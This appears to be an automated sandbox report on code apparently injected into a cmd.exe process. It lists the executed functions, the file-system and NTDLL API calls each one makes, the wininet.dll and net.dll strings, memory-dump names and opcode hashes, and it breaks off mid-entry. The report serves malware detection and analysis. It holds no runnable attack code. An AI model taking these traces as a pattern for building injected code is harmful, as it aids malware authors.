Total number of Nodes:	1197
Total number of Limit Nodes:	134

Executed Functions

Function 02B131C0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 02B132A1
FindNextFileW.KERNELBASE(?,00000010), ref: 02B132DE
FindClose.KERNELBASE(?), ref: 02B132E9

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: e88cdd88fcecee6841867b5a30f34674071e02c885381e9ad220d53b990d3635
Instruction ID: 67dc5c0c872cc808f489f17dc9afb6e359ae81995fa09354c3af915f287a4513
Opcode Fuzzy Hash: e88cdd88fcecee6841867b5a30f34674071e02c885381e9ad220d53b990d3635
Instruction Fuzzy Hash: A83185719002487BDB25EBA4CC85FEF77BDDF44744F5444D8F948A7180EB70AA448BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B1C78A Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,?,02B1750C,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B1750C,?,00000000,00000060,00000000,00000000), ref: 02B1C7DD

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6f8f3415c97052d706914a1cf30cde114b2bacf6da38c23cb169ffcfc447d09e
Instruction ID: 61a74715bad17f277964b0abeadac21417492a0c45539dee6e0972ed3ea0be01
Opcode Fuzzy Hash: 6f8f3415c97052d706914a1cf30cde114b2bacf6da38c23cb169ffcfc447d09e
Instruction Fuzzy Hash: 9801C9B2205508AFCB18CF9CDC85DEB37AAAF8C754F158248FA5DD7251C630E811CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02B1C790 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,?,02B1750C,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B1750C,?,00000000,00000060,00000000,00000000), ref: 02B1C7DD

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
Instruction ID: 4f8fba3b8bf279def3ea4a0663160cc7ff0bf04ea527ceb525f3f7c0ec2e7435
Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
Instruction Fuzzy Hash: C0F06DB2215208ABCB48DF89DC85EEB77ADAF8C754F158248BA0997241D630F8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B1C840 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02B176D0,02B12BA8,FFFFFFFF,02B171BA,00000002,?,02B176D0,00000002,02B171BA,FFFFFFFF,02B12BA8,02B176D0,00000002,00000000), ref: 02B1C885

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
Instruction ID: 542e39f4fa6df91b2206385e067d606a916f565bc2a943f5502553d6e1f805fc
Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
Instruction Fuzzy Hash: 90F0A4B2200208ABCB14DF99DC85EEB77ADAF8C754F158648BA0D97241D630E8118BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B1C8BA Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02B0E535,00000000,?,02B0E535,?,?,?,?,?,?,?,00000000,?,00000000), ref: 02B1C8E5

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 02c3fce547ab5769241fc4d153cdaa34f02b7a12e3f8bacb303455b834098bfd
Instruction ID: c08f0f2bb9f3145a737d70004239a5058b25cb40c09275ed4a2c146f8e135e66
Opcode Fuzzy Hash: 02c3fce547ab5769241fc4d153cdaa34f02b7a12e3f8bacb303455b834098bfd
Instruction Fuzzy Hash: C5E08C72244214BBDB14EFB88C85ECB3F69DF4A264F098599FA5D9B643C131E6008BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B1C890 Relevance: 1.5, APIs: 1, Instructions: 20filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(02B174D2,00000002,?,02B174D2,00000000,00000018,?,?,BCB48B9C,00000000,?), ref: 02B1C8B5

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
Instruction ID: de79efc4c1713820d9b44e4dd0a27e9253f37523767ddb9b0740e31c12a3104c
Opcode Fuzzy Hash: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
Instruction Fuzzy Hash: 97D017722402146BD614EB98DC89ED77BACDF48760F018895BA1C5B241C630FA008BE1

Uniqueness

Uniqueness Score: -1.00%

Function 02B1C88A Relevance: 1.5, APIs: 1, Instructions: 20filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(02B174D2,00000002,?,02B174D2,00000000,00000018,?,?,BCB48B9C,00000000,?), ref: 02B1C8B5

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 6d709ba76f1a59f822e603d119b64ec40ac37d9d7f9c7068ea3450707d0937b9
Instruction ID: b833a18cecc4a87e3983bc6647cbf5f354f78718c89e8f20d7ace6dfa327b564
Opcode Fuzzy Hash: 6d709ba76f1a59f822e603d119b64ec40ac37d9d7f9c7068ea3450707d0937b9
Instruction Fuzzy Hash: B6E01271240224ABD614EF94DC49ED73769DF84760F058495BA1C6B641D630E600C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 02B1C8C0 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02B0E535,00000000,?,02B0E535,?,?,?,?,?,?,?,00000000,?,00000000), ref: 02B1C8E5

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
Instruction ID: 1b8cc1df25a9e02221670970da89f24453740dc09b9090ea76aafdaf910e6859
Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
Instruction Fuzzy Hash: F6D01772200214ABD614EBA8DC89ED77BADDF48660F018495BA1C5B242C530FA008AE1

Uniqueness

Uniqueness Score: -1.00%

Function 03019B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03019B0A

Memory Dump Source

Source File: 00000011.00000002.781495771.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true

Associated: 00000011.00000002.781495771.00000000030CB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.781495771.00000000030CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1ec02dda55be7228b47474959f329ae9d59087ec0ff762fd7bc076a2f74a1f83
Instruction ID: bf310b44030340840723674e5334f5741a957f9e942ffcef4e611f3ff7d8557e
Opcode Fuzzy Hash: 1ec02dda55be7228b47474959f329ae9d59087ec0ff762fd7bc076a2f74a1f83
Instruction Fuzzy Hash: 5C90026124205D02D140B159C4147070546D7D0651F71C011A4114554D87568D6577F1

Uniqueness

Uniqueness Score: -1.00%

Function 03019710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0301971A

Memory Dump Source

Source File: 00000011.00000002.781495771.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true

Associated: 00000011.00000002.781495771.00000000030CB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.781495771.00000000030CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d480f6a0a11b6022ba2e33d09c712a5882766617d41554ced1a045c0dc3e1e73
Instruction ID: 4fd538469a0cfbfa3ffefa950255d46344cbdd6dcfd9e1db51eb7b5451e21aa1
Opcode Fuzzy Hash: d480f6a0a11b6022ba2e33d09c712a5882766617d41554ced1a045c0dc3e1e73
Instruction Fuzzy Hash: F990027120205902D100A5999408646054597E0351F71D011A9114555EC7A58C917271

Uniqueness

Uniqueness Score: -1.00%

Function 03019780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0301978A

Memory Dump Source

Source File: 00000011.00000002.781495771.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true

Associated: 00000011.00000002.781495771.00000000030CB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.781495771.00000000030CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 262455cd4d95457306f6746727959e064c55d679993be67a7e355d6457d9a657
Instruction ID: 92a8c8cc1e5cb723bb6c682b80275bc278ac728f76f749d2668845180887f02e
Opcode Fuzzy Hash: 262455cd4d95457306f6746727959e064c55d679993be67a7e355d6457d9a657
Instruction Fuzzy Hash: 8390026921305502D180B159940860A054597D1252FB1D415A4105558CCA558C696361

Uniqueness

Uniqueness Score: -1.00%

Function 03019FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03019FEA

Memory Dump Source

Source File: 00000011.00000002.781495771.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true

Associated: 00000011.00000002.781495771.00000000030CB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.781495771.00000000030CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6b1acc8f0abfedfcc499df425bec6290d715f230a144d301064a89d7b038b8d5
Instruction ID: 07acdddb750a5e43529e854c1f7f5d08bcb11e7eeb32cff6e67c41acc4dfa1a1
Opcode Fuzzy Hash: 6b1acc8f0abfedfcc499df425bec6290d715f230a144d301064a89d7b038b8d5
Instruction Fuzzy Hash: FB90027131219902D110A159C404706054597D1251F71C411A4914558D87D58C917262

Uniqueness

Uniqueness Score: -1.00%

Function 03019A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03019A5A

Memory Dump Source

Source File: 00000011.00000002.781495771.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true

Associated: 00000011.00000002.781495771.00000000030CB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.781495771.00000000030CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 904c714728843db0b2096cdbd42f3238b97d2f294268bd20fff478263639d686
Instruction ID: a65e8a45994a09674411ee7e843a427af8c8fe7bca42c79f05af45bdd6decafa
Opcode Fuzzy Hash: 904c714728843db0b2096cdbd42f3238b97d2f294268bd20fff478263639d686
Instruction Fuzzy Hash: 0490026121285542D200A5698C14B07054597D0353F71C115A4244554CCA558C616661

Uniqueness

Uniqueness Score: -1.00%

Function 030196D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030196DA

Memory Dump Source

Source File: 00000011.00000002.781495771.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true

Associated: 00000011.00000002.781495771.00000000030CB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.781495771.00000000030CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 51c030e1a07fdfb0e3f1472c4ac399aa68d2bad46927adf93a89c6fe68418cb7
Instruction ID: b215667b72f8bc023e40235c60e4efbf63231c8b20bc13aaf9e58e91cc466a16
Opcode Fuzzy Hash: 51c030e1a07fdfb0e3f1472c4ac399aa68d2bad46927adf93a89c6fe68418cb7
Instruction Fuzzy Hash: 3990027120205D42D100A1598404B46054597E0351F71C016A4214654D8755CC517661

Uniqueness

Uniqueness Score: -1.00%

Function 030196E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030196EA

Memory Dump Source

Source File: 00000011.00000002.781495771.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true

Associated: 00000011.00000002.781495771.00000000030CB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.781495771.00000000030CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ae4a08265217dba254a9a411ffdcbfe7019d6ce383b4cbf12b0c3ec78a935140
Instruction ID: 434a9354479cbe3404f96e0652954c1f83a157a893a7a9916be65e5faa0e294e
Opcode Fuzzy Hash: ae4a08265217dba254a9a411ffdcbfe7019d6ce383b4cbf12b0c3ec78a935140
Instruction Fuzzy Hash: 179002712020DD02D110A159C40474A054597D0351F75C411A8514658D87D58C917261

Uniqueness

Uniqueness Score: -1.00%

Function 03019910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0301991A

Memory Dump Source

Source File: 00000011.00000002.781495771.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true

Associated: 00000011.00000002.781495771.00000000030CB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.781495771.00000000030CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e954bf29bc6b1d09bdf45af9b64799baf760960f6322639352e880d8e05efe66
Instruction ID: 9a755e1ee24297bcf2733ae045abff88402545c68021425ecf95357fdfec4efa
Opcode Fuzzy Hash: e954bf29bc6b1d09bdf45af9b64799baf760960f6322639352e880d8e05efe66
Instruction Fuzzy Hash: 679002B120205902D140B1598404746054597D0351F71C011A9154554E87998DD577A5

Uniqueness

Uniqueness Score: -1.00%

Function 03019540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0301954A

Memory Dump Source

Source File: 00000011.00000002.781495771.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true

Associated: 00000011.00000002.781495771.00000000030CB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.781495771.00000000030CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3507018e86954d79204efff4bc3ca007f1e6357e9a9c3b0b77d8ff53aa497a3e
Instruction ID: 2b1e43ee3e800ee459a7e214eb4a93b9883f0049ce517b4c50ea42a24cf221e4
Opcode Fuzzy Hash: 3507018e86954d79204efff4bc3ca007f1e6357e9a9c3b0b77d8ff53aa497a3e
Instruction Fuzzy Hash: 3D900265212055030105E5594704507058697D53A1371C021F5105550CD7618C616261

Uniqueness

Uniqueness Score: -1.00%

Function 03019560 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0301956A

Memory Dump Source

Source File: 00000011.00000002.781495771.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true

Associated: 00000011.00000002.781495771.00000000030CB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.781495771.00000000030CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fafaf8a640d6ea83477806100faea74aeb22b3207fe74514345a5e19695a0e03
Instruction ID: 51978c733edb22f9475cd70bdf398e4cd3f53c1dd7fc54770289c96f67264d75
Opcode Fuzzy Hash: fafaf8a640d6ea83477806100faea74aeb22b3207fe74514345a5e19695a0e03
Instruction Fuzzy Hash: 2A900265222055020145E559460450B0985A7D63A13B1C015F5506590CC7618C656361

Uniqueness

Uniqueness Score: -1.00%

Function 030199A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030199AA

Memory Dump Source

Source File: 00000011.00000002.781495771.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true

Associated: 00000011.00000002.781495771.00000000030CB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.781495771.00000000030CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1d47372739d0ce161a573074176cd2f9b2bf9a902ca0fe49b98093b91d942c5c
Instruction ID: ed00d0b47fcba18813395181377a1b6fd62bbb1f75b9245467df6cf433ba5c09
Opcode Fuzzy Hash: 1d47372739d0ce161a573074176cd2f9b2bf9a902ca0fe49b98093b91d942c5c
Instruction Fuzzy Hash: 049002A134205942D100A1598414B060545D7E1351F71C015E5154554D8759CC527266

Uniqueness

Uniqueness Score: -1.00%

Function 030195D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030195DA

Memory Dump Source

Source File: 00000011.00000002.781495771.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true

Associated: 00000011.00000002.781495771.00000000030CB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.781495771.00000000030CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 95413e6dfaea89ed5d48d994940c8b1fa61c051a5bae8ff40c890f397013d9bd
Instruction ID: 2343d4a91b81a735c3cc459c3e4a9bcaeb5c2b34832d13c1194872229e0462f1
Opcode Fuzzy Hash: 95413e6dfaea89ed5d48d994940c8b1fa61c051a5bae8ff40c890f397013d9bd
Instruction Fuzzy Hash: 099002A1203055034105B1598414616454A97E0251B71C021E5104590DC6658C917265

Uniqueness

Uniqueness Score: -1.00%

Function 03019840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0301984A

Memory Dump Source

Source File: 00000011.00000002.781495771.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true

Associated: 00000011.00000002.781495771.00000000030CB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.781495771.00000000030CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 59cde27a8734e24afa1712ccf576190a2ced0a0635513d25328efc5b1984216e
Instruction ID: f0018790605ccaa8c71a36be9b153a4ac6b58d7fe7c6e9f5602c54bb6ceae123
Opcode Fuzzy Hash: 59cde27a8734e24afa1712ccf576190a2ced0a0635513d25328efc5b1984216e
Instruction Fuzzy Hash: AD900261243096525545F15984045074546A7E02917B1C012A5504950C86669C56E761

Uniqueness

Uniqueness Score: -1.00%

Function 03019860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0301986A

Memory Dump Source

Source File: 00000011.00000002.781495771.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true

Associated: 00000011.00000002.781495771.00000000030CB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.781495771.00000000030CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d7352ccb3b3625c3b7fcc807b5932f73a7aabc2ae74115c6939c0bb168f46567
Instruction ID: 3f669e6d307ca72882ca7e79e0454487b6e3e3be8530270ebc1190334a106825
Opcode Fuzzy Hash: d7352ccb3b3625c3b7fcc807b5932f73a7aabc2ae74115c6939c0bb168f46567
Instruction Fuzzy Hash: 1B90027120205913D111A1598504707054997D0291FB1C412A4514558D97968D52B261

Uniqueness

Uniqueness Score: -1.00%

Function 02B08D70 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 6670dcd4058140a111bb929a3b656d5b4bd54a6c7405881a3fed4e4b9b3d73b6
Instruction ID: 957674f912b1989f455c1a20929b28ac72b1bd67f2a9cebec31b6edfb56e18e9
Opcode Fuzzy Hash: 6670dcd4058140a111bb929a3b656d5b4bd54a6c7405881a3fed4e4b9b3d73b6
Instruction Fuzzy Hash: DCA183B1D00209ABDB15DFA4CC81EEFBBB9EF44304F44859DE619A6181EB70A744CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02B08D6F Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 768917b704f00a8703925b57ece4fd195c73c3887eb3164e478a184be935c7aa
Instruction ID: 99f08cf77bf04d9a53449cb7e22ff90f25aabd3a049bdd4581cabe1ab6942cba
Opcode Fuzzy Hash: 768917b704f00a8703925b57ece4fd195c73c3887eb3164e478a184be935c7aa
Instruction Fuzzy Hash: 4C71E6B1D00209ABDB25DBA0CC81FEEBBB9EF44304F44859DE50862181FB70A745CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02B1B4F0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 92sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02B1B5AB

Strings

net.dll, xrefs: 02B1B578, 02B1B5FA, 02B1B5D2, 02B1B5DE, 02B1B606
wininet.dll, xrefs: 02B1B552, 02B1B55E

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 6b5884dae5fa2fca51ca3157bc5231cb79e567d914f5d6e9b7c3fda3ef8f428b
Instruction ID: 7fe7c378eb045a970447c26a87543cc8904673172da289291f29ca775a3799ad
Opcode Fuzzy Hash: 6b5884dae5fa2fca51ca3157bc5231cb79e567d914f5d6e9b7c3fda3ef8f428b
Instruction Fuzzy Hash: 8831BEB5600704BBD314DFA4D880FA7B7B8EB88704F40855EE6595B285D670A540CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B1B4E4 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 85sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02B1B5AB

Strings

net.dll, xrefs: 02B1B578, 02B1B5D2, 02B1B5DE
wininet.dll, xrefs: 02B1B552, 02B1B55E

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 103b08a913db9854d6414e5eb8aed72b8e5240099b98e51cecb61fe59b04d7f5
Instruction ID: 44628a49570993783fcf4d1184472d190707cb0d4724a8d6380ed2da2bc6c6b0
Opcode Fuzzy Hash: 103b08a913db9854d6414e5eb8aed72b8e5240099b98e51cecb61fe59b04d7f5
Instruction Fuzzy Hash: 5131C2B1A01704BBD714DFA4D8C1FAAF7B9EF48704F5081A9E6495B285D370A540CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 02B0FCC0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 02B0FDE3

Strings

@, xrefs: 02B0FD04

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: @
API String ID: 3188754299-2766056989
Opcode ID: efafc4d34df24d79d00d66dc810e4cb32a360bf40c90895c4f7146014995b6c3
Instruction ID: cf6534794e0ddcc93f84cc0d2dd5f7c086e4a134b0cc5cdca6395992ec3ac481
Opcode Fuzzy Hash: efafc4d34df24d79d00d66dc810e4cb32a360bf40c90895c4f7146014995b6c3
Instruction Fuzzy Hash: EE7160B19002086BDB25EB64CCC5FFBB7BDFF54304F4449D9AA1997181EB70A6858F90

Uniqueness

Uniqueness Score: -1.00%

Function 02B15250 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 02B15267

Strings

@J7<, xrefs: 02B1527B

Memory Dump Source

